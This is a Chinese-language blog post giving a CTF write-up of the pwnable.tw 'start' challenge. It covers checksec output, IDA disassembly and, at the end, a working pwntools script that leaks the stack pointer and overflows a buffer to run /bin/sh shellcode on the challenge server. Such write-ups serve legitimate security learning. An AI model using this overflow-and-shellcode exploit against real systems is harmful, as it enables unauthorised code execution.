<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwnable.tw,">










<meta name="description" content="前段时间在看ctf-wiki学习pwn，现在打算开始刷题巩固之前学习的一些知识  查看文件基本信息123456789v1cky@ubuntu:~/Desktop/pwnable/start$ checksec start.dms[*] &apos;/home/v1cky/Desktop/pwnable/start/start.dms&apos;    Arch:     i386-32-little    RELR">
<meta name="keywords" content="pwnable.tw">
<meta property="og:type" content="article">
<meta property="og:title" content="pwnable.tw start writeup">
<meta property="og:url" content="https://v1ckydxp.github.io/archives/2019/04/24/pwnable-tw-start-writeup/index.html">
<meta property="og:site_name" content="v1cky&#39;blog">
<meta property="og:description" content="前段时间在看ctf-wiki学习pwn，现在打算开始刷题巩固之前学习的一些知识  查看文件基本信息123456789v1cky@ubuntu:~/Desktop/pwnable/start$ checksec start.dms[*] &apos;/home/v1cky/Desktop/pwnable/start/start.dms&apos;    Arch:     i386-32-little    RELR">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2019-07-11T00:59:29.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pwnable.tw start writeup">
<meta name="twitter:description" content="前段时间在看ctf-wiki学习pwn，现在打算开始刷题巩固之前学习的一些知识  查看文件基本信息123456789v1cky@ubuntu:~/Desktop/pwnable/start$ checksec start.dms[*] &apos;/home/v1cky/Desktop/pwnable/start/start.dms&apos;    Arch:     i386-32-little    RELR">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://v1ckydxp.github.io/archives/2019/04/24/pwnable-tw-start-writeup/">





  <title>pwnable.tw start writeup | v1cky'blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">v1cky'blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">few words,many deeds!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://v1ckydxp.github.io/archives/2019/04/24/pwnable-tw-start-writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="v1cky01dxp">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="v1cky'blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">pwnable.tw start writeup</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-04-24T16:50:00+08:00">
                2019-04-24
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">Post modified&#58;</span>
              
              <time title="Post modified" itemprop="dateModified" datetime="2019-07-11T08:59:29+08:00">
                2019-07-11
              </time>
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/二进制/" itemprop="url" rel="index">
                    <span itemprop="name">二进制</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  769
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  3
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote>
<p>前段时间在看ctf-wiki学习pwn，现在打算开始刷题巩固之前学习的一些知识</p>
</blockquote>
<h3 id="查看文件基本信息"><a href="#查看文件基本信息" class="headerlink" title="查看文件基本信息"></a>查看文件基本信息</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">v1cky@ubuntu:~/Desktop/pwnable/start$ checksec start.dms</span><br><span class="line">[*] '/home/v1cky/Desktop/pwnable/start/start.dms'</span><br><span class="line">    Arch:     i386-32-little</span><br><span class="line">    RELRO:    No RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX disabled</span><br><span class="line">    PIE:      No PIE (0x8048000)</span><br><span class="line">v1cky@ubuntu:~/Desktop/pwnable/start$ ldd -d start.dms</span><br><span class="line">	not a dynamic executable</span><br></pre></td></tr></table></figure>
<blockquote>
<p>可以看到，该可执行文件几乎什么安全保护都没有开启，是32位程序，而且属于静态链接。</p>
</blockquote>
<h3 id="分析文件行为"><a href="#分析文件行为" class="headerlink" title="分析文件行为"></a>分析文件行为</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">v1cky@ubuntu:~/Desktop/pwnable/start$ ./start.dms</span><br><span class="line">Let<span class="string">'s start the CTF:aaaaaaaaa</span></span><br><span class="line"><span class="string">v1cky@ubuntu:~/Desktop/pwnable/start$ ./start.dms</span></span><br><span class="line"><span class="string">Let'</span>s start the CTF:11111111111111111111111111111111111111</span><br><span class="line">Segmentation fault (core dumped)</span><br><span class="line">v1cky@ubuntu:~/Desktop/pwnable/start$</span><br></pre></td></tr></table></figure>
<blockquote>
<p>可以看到该程序的行为就是开始输入一个提示字符串”Let’s start the CTF :”，然后接受用户输入一个字符串，然后退出，明显可以看出，用户输入字符串长度又限制。具体可以用IDA打开，逆向分析程序行为。</p>
</blockquote>
<h3 id="IDA-查看文件逻辑"><a href="#IDA-查看文件逻辑" class="headerlink" title="IDA 查看文件逻辑"></a>IDA 查看文件逻辑</h3><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">.text:<span class="number">08048060</span>                     <span class="keyword">public</span> _start</span><br><span class="line">.text:<span class="number">08048060</span>     _start          proc near               ; DATA XREF: LOAD:<span class="number">08048018</span>↑o</span><br><span class="line">.text:<span class="number">08048060</span> <span class="number">000</span>                 push    esp</span><br><span class="line">.text:<span class="number">08048061</span> <span class="number">004</span>                 push    offset _exit</span><br><span class="line">.text:<span class="number">08048066</span> <span class="number">008</span>                 xor     eax, eax</span><br><span class="line">.text:<span class="number">08048068</span> <span class="number">008</span>                 xor     ebx, ebx</span><br><span class="line">.text:<span class="number">0804806</span>A <span class="number">008</span>                 xor     ecx, ecx</span><br><span class="line">.text:<span class="number">0804806</span>C <span class="number">008</span>                 xor     edx, edx</span><br><span class="line">.text:<span class="number">0804806</span>E <span class="number">008</span>                 push    <span class="number">3</span>A465443h       <span class="comment">//CTF:</span></span><br><span class="line">.text:<span class="number">08048073</span> <span class="number">00</span>C                 push    <span class="number">20656874</span>h      <span class="comment">//the </span></span><br><span class="line">.text:<span class="number">08048078</span> <span class="number">010</span>                 push    <span class="number">20747261</span>h      <span class="comment">//art </span></span><br><span class="line">.text:<span class="number">0804807</span>D <span class="number">014</span>                 push    <span class="number">74732073</span>h      <span class="comment">//s st</span></span><br><span class="line">.text:<span class="number">08048082</span> <span class="number">018</span>                 push    <span class="number">2774654</span>Ch       <span class="comment">//let'</span></span><br><span class="line">.text:<span class="number">08048087</span> <span class="number">01</span>C                 mov     ecx, esp        ; addr</span><br><span class="line">.text:<span class="number">08048089</span> <span class="number">01</span>C                 mov     dl, <span class="number">14</span>h         ; len</span><br><span class="line">.text:<span class="number">0804808B</span> <span class="number">01</span>C                 mov     bl, <span class="number">1</span>           ; fd</span><br><span class="line">.text:<span class="number">0804808</span>D <span class="number">01</span>C                 mov     al, <span class="number">4</span></span><br><span class="line">.text:<span class="number">0804808F</span> <span class="number">01</span>C                 <span class="keyword">int</span>     <span class="number">80</span>h             ; LINUX - sys_write</span><br><span class="line">.text:<span class="number">08048091</span> <span class="number">01</span>C                 xor     ebx, ebx</span><br><span class="line">.text:<span class="number">08048093</span> <span class="number">01</span>C                 mov     dl, <span class="number">3</span>Ch</span><br><span class="line">.text:<span class="number">08048095</span> <span class="number">01</span>C                 mov     al, <span class="number">3</span></span><br><span class="line">.text:<span class="number">08048097</span> <span class="number">01</span>C                 <span class="keyword">int</span>     <span class="number">80</span>h             ; LINUX -sys_read</span><br><span class="line">.text:<span class="number">08048099</span> <span class="number">01</span>C                 add     esp, <span class="number">14</span>h</span><br><span class="line">.text:<span class="number">0804809</span>C <span class="number">008</span>                 retn</span><br><span class="line">.text:<span class="number">0804809</span>C     _start          endp ; sp-analysis failed</span><br><span class="line">.text:<span class="number">0804809</span>C</span><br><span class="line">.text:<span class="number">0804809</span>D</span><br><span class="line">.text:<span class="number">0804809</span>D     ; =============== S U B R O U T I N E =======================================</span><br><span class="line">.text:<span class="number">0804809</span>D</span><br><span class="line">.text:<span class="number">0804809</span>D     ; Attributes: noreturn</span><br><span class="line">.text:<span class="number">0804809</span>D</span><br><span class="line">.text:<span class="number">0804809</span>D     ; <span class="function"><span class="keyword">void</span> <span class="title">exit</span><span class="params">(<span class="keyword">int</span> status)</span></span></span><br><span class="line">.text:0804809D     _exit           proc near               ; DATA XREF: _start+1↑o</span><br><span class="line">.text:<span class="number">0804809</span>D <span class="number">000</span>                 pop     esp</span><br><span class="line">.text:<span class="number">0804809</span>E <span class="number">-04</span>                 xor     eax, eax</span><br><span class="line">.text:<span class="number">080480</span>A0 <span class="number">-04</span>                 inc     eax</span><br><span class="line">.text:<span class="number">080480</span>A1 <span class="number">-04</span>                 <span class="keyword">int</span>     <span class="number">80</span>h             ; LINUX - sys_exit</span><br><span class="line">.text:<span class="number">080480</span>A1     _exit           endp ; sp-analysis failed</span><br></pre></td></tr></table></figure>
<blockquote>
<p>通过汇编可以看到，对寄存器eax,ebx,ecx,edx进行了操作，而且通过int 80中断的方式来进入系统调用。sys_write()的系统调用号是4，ebx的值为1，为标准输出（stdin 0,stdout 1,stderr 2）,ecx为要输出字符串的地址，edx为0x14，为输出字符串的长度。所以最后得到的系统调用代码为sys_write(1,buf_addr,20)，sys_read(0,buf_Addr,60)。</p>
<p><a href="http://syscalls.kernelgrok.com" target="_blank" rel="noopener">http://syscalls.kernelgrok.com</a> 这里可以查询有关系统调用的资料。</p>
</blockquote>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><blockquote>
<p>分析看出，在程序输出”Let’s start the CTF :”之后，执行了mov ecx,esp；addr 这条汇编语句，也就是说当前esp的值就是输入字符串存放的地址，所以我们可以通过泄漏esp的地址来得到最后shellcode的地址。经过调试发现，栈中保存字符串长度为20字节，然后就是返回地址。</p>
</blockquote>
<h3 id="最后exp"><a href="#最后exp" class="headerlink" title="最后exp"></a>最后exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">shellcode = <span class="string">'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'</span></span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'chall.pwnable.tw'</span>,<span class="number">10000</span>)</span><br><span class="line"><span class="comment">#p = process('./start.dms')</span></span><br><span class="line">gad = <span class="number">0x8048087</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">payload1 = <span class="string">"a"</span>*<span class="number">20</span>+p32(gad)</span><br><span class="line"><span class="keyword">print</span> payload1</span><br><span class="line">p.recvuntil(<span class="string">':'</span>)</span><br><span class="line">p.send(payload1)</span><br><span class="line">leak_esp = u32(p.recv(<span class="number">4</span>))</span><br><span class="line"><span class="keyword">print</span> hex(leak_esp)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">"a"</span>*<span class="number">20</span>+p32(leak_esp+<span class="number">20</span>)+shellcode</span><br><span class="line"><span class="keyword">print</span> payload</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:</strong>
    v1cky01dxp
  </li>
  <li class="post-copyright-link">
    <strong>Post link:</strong>
    <a href="https://v1ckydxp.github.io/archives/2019/04/24/pwnable-tw-start-writeup/" title="pwnable.tw start writeup">https://v1ckydxp.github.io/archives/2019/04/24/pwnable-tw-start-writeup/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice: </strong>
    All articles in this blog are licensed under <a href="https://v1ckydxp.github.io" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> unless stating additionally.
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwnable-tw/" rel="tag"># pwnable.tw</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/14/2017_0ctf_babyheap/" rel="next" title="2017 0ctf babyheap writeup">
                <i class="fa fa-chevron-left"></i> 2017 0ctf babyheap writeup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/04/24/pwnable-tw-orw-writeup/" rel="prev" title="pwnable.tw orw writeup">
                pwnable.tw orw writeup <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">v1cky01dxp</p>
	      <img class="site-author-image" itemprop="image" src="/images/head.jpeg" alt="v1cky01dxp">
	      <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">30</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">categories</span>
                
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/v1ckydxp" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:sunshinedxp@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#查看文件基本信息"><span class="nav-number">1.</span> <span class="nav-text">查看文件基本信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#分析文件行为"><span class="nav-number">2.</span> <span class="nav-text">分析文件行为</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#IDA-查看文件逻辑"><span class="nav-number">3.</span> <span class="nav-text">IDA 查看文件逻辑</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用"><span class="nav-number">4.</span> <span class="nav-text">利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#最后exp"><span class="nav-number">5.</span> <span class="nav-text">最后exp</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">v1cky01dxp</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">35.5k</span>
  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
